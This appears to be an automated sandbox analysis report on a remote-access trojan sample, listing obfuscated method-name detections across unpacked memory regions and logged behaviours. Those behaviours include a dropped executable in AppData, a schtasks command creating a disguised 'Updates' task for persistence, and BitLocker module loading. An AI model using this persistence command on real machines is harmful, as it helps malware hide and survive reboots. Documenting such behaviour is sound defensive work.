Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KfYvtUBOq" /XML "C:\Users\user\AppData\Local\Temp\tmp89CA.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
